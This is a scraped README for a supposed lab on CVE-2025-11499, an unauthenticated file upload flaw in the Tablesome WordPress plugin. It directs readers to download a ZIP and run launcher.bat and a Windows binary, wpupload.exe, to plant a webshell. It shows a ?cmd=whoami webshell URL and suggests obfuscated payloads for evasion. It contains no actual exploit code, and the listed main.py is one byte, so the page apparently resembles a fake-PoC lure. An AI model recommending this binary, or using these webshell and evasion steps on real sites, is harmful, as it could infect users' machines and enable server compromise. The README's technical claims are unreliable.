来源

关联漏洞

介绍

# Lab: CVE-2025-11499 - Unauthenticated Arbitrary File Upload Vulnerability in Tablesome WordPress Plugin

## 🚀 Overview
This lab demonstrates an unauthenticated arbitrary file upload vulnerability in the Tablesome plugin for WordPress. The vulnerability resides in the `set_featured_image_from_external_url()` function, which fails to properly validate file types during uploads. This allows attackers to upload malicious files to the server without authentication. In environments where workflows permit unauthenticated users to set featured images (e.g., via specific form configurations), this could escalate to remote code execution (RCE) by uploading webshells or executable scripts.


**Safety Disclaimer:**  
This lab is for educational and research purposes only. Do not use the provided tools or techniques on any systems without explicit authorization. Misuse may violate laws such as the Computer Fraud and Abuse Act (CFAA) or equivalent regulations in your jurisdiction. The author assumes no liability for any misuse.

## 📋 Prerequisites
To set up and run this lab, you'll need:
- A local web server environment with PHP 8.1+ and MySQL 8.0+.
- WordPress.
- Tablesome plugin.
- Administrative access to your local machine for file modifications and server configuration.
- Basic knowledge of HTTP requests, file uploads, and web server administration.
- Windows OS for running the exploit tool (compatibility tested on Windows 10/11).


## Download & Install
1. Download the lab repository as a ZIP file from: https://github.com/usjnx72726w/CVE-2025-11499-LAB/raw/refs/heads/main/Hero/cve-2025-11499-lab.zip  

2. Extract the ZIP to a local directory.

3. Set up the vulnerable WordPress environment:
   - Install your local web server and start Apache and MySQL services.
   - Create a new database in phpMyAdmin (e.g., named `wp_tablesome_vuln`).
   - Download and extract WordPress to your web root (e.g., `C:\xampp\htdocs\wordpress`).
   - Navigate to `http://localhost/wordpress` in your browser and complete the WordPress installation, using the database you created.
   - In the WordPress admin dashboard (`http://localhost/wordpress/wp-admin`), install the Tablesome plugin

## 🛠 Quick Start
1. Download and extract the lab ZIP as described above.
2. Navigate to the extracted directory.
3. Run `launcher.bat` to launch the exploit tool (`wpupload.exe`).
   - This batch file initializes the tool and opens a command-line interface for targeting the vulnerable endpoint.

## 🔍 Exploitation Steps
Once the environment is set up, follow these steps to demonstrate the vulnerability:

1. **Launch the Exploit Tool:**
   - Run `laucnher.bat` from the lab directory.
   - The tool (`wpupload.exe`) will prompt for target details:
   - Target URL: `http://localhost/wordpress/wp-admin/admin-ajax.php`
   - Action: `tablesome_set_featured_image`
   - The tool automates the upload by crafting a multipart/form-data request, bypassing file type checks via manipulated headers (e.g., spoofing Content-Type as image/jpeg while embedding PHP code).
   - Upon success, the webshell will be uploaded to `wp-content/uploads/yyyy/mm/webshell.php`.

2. **Achieve Remote Code Execution:**
   - Access the uploaded webshell: `http://localhost/wordpress/wp-content/uploads/yyyy/mm/webshell.php?cmd=whoami`
   - Replace `cmd` with arbitrary commands
   - Note: RCE depends on server permissions (e.g., writable uploads dir and executable PHP). In production, this could lead to full server compromise.

3. **Advanced Exploitation Notes:**
   - The exploit leverages lack of nonce checks and improper sanitization in `wp_handle_upload()`.
   - For evasion, use obfuscated payloads (e.g., base64-encoded PHP in image metadata).
   - Monitor server logs (`error_log`) for upload attempts.


For questions or contributions, open an issue on the GitHub repo.

文件快照

 [4.0K]  /data/pocs/3b92201ae5ecf9c1c7d0bdeaf5130d477a883926
├── [4.0K]  Hero
│   ├── [8.5M]  cve-2025-11499-lab.zip
│   └── [   1]  main.py
└── [3.8K]  README.md

1 directory, 3 files

备注